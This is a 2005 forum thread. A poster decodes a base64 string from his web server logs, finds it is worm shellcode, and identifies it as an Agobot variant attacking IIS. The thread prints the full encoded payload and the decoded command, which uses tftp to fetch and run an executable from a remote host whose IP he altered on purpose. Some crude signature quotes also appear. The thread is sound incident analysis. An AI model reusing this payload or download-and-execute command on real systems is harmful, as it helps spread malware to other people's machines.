Short exploit investigation...

Started by iago, June 09, 2005, 06:41:12 PM

Previous topic - Next topic

0 Members and 5 Guests are viewing this topic.

Print
Go Down Pages1
User actions

iago

June 09, 2005, 06:41:12 PM
I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:

Code Select
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDE0Mi4xNjEuNjYuNDggR0VUIHd1YW1rb3AuZXhlJnN0YXJ0IHd1YW1rb3AuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgP

This was coming from all over, and looks like an exploit.  Something that doesn't belong.  So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):

Code Select
AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#


What is looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit

Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program.  (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected :P)

A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/

Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant

Conclusion: It's a AGOBOT worm/trojan spreading itself using a web server vulnerability.  I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm) :)

Hope that somebody found that neresting.

Quik

#1
June 09, 2005, 06:52:25 PM Last Edit: June 09, 2005, 07:00:04 PM by Quik
There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.

[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.
Quote[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

iago

#2
June 09, 2005, 06:54:15 PM
It was on "incidents".  And that is a sdbot variant, this is agobot.  Same exploit, though

iago

#3
June 12, 2005, 02:37:52 PM
Here are a couple graphs of this attack:

The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html

The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html

As you can see, it's only really been around since the 6th, and it looks like it already peaked.  In another week, I'll see how it looks again.

deadly7

#4
June 13, 2005, 10:42:37 AM
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
[17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Krazed

#5
June 13, 2005, 10:59:57 AM
Quote from: deadly7 on June 13, 2005, 10:42:37 AM
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.
It is good to be good, but it is better to be lucky.

iago

#6
June 13, 2005, 02:02:53 PM
Yeah, I'm assuming it's just a plain worm.  It randomly either picks an ip or, like Archon said, scans a subnet.

mynameistmp

#7
June 14, 2005, 02:43:39 AM
What was your command-string that you used to run that through your decoder ?

iago

#8
June 14, 2005, 10:43:21 AM
It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u.  I think you can also use uuencode somehow.

GameSnake

#9
August 16, 2005, 11:30:53 PM
Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

iago

#10
August 17, 2005, 09:07:05 AM
Quote from: GameSnake on August 16, 2005, 11:30:53 PM
Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected.  I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so.  There aren't any .exe's on Red Hat, so I wouldn't worry about that. 

GameSnake

#11
August 17, 2005, 01:34:49 PM Last Edit: August 17, 2005, 08:29:01 PM by GameSnake
nvm issued cleared up
Print
Go Up Pages1
User actions